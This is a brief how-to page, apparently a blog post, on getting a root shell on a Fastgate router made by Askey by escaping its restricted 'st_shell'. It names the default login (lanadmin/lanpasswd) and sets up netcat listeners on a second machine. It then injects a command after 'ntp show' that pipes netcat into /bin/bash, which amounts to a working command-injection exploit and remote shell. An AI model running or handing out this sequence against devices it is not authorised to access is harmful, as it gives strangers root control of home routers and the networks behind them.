+++
title = "How to get an Askey shell from st_shell"
+++
On a computer (10.0.0.1): `nc -l -p 1234` and `nc -l -p 1235`

Then, `ssh lanadmin@10.0.0.2` (the Fastgate, whose password is lanpasswd).

Now, you're in st_shell :(. However, the `ntp` command is, let's say, interesting.

Run `ntp show`, then at the end of the output, type `nc 10.0.0.1 1234 | /bin/bash | nc 10.0.0.1 1235`

You're now root! Profit! (One netcat is for the standard inout, the other is the standard output) The standard error is in the original SSH, even though it can be redirected in the pipe, i guess.

If you want, you can run a Debian chroot (multiple guides available for this specific device)!
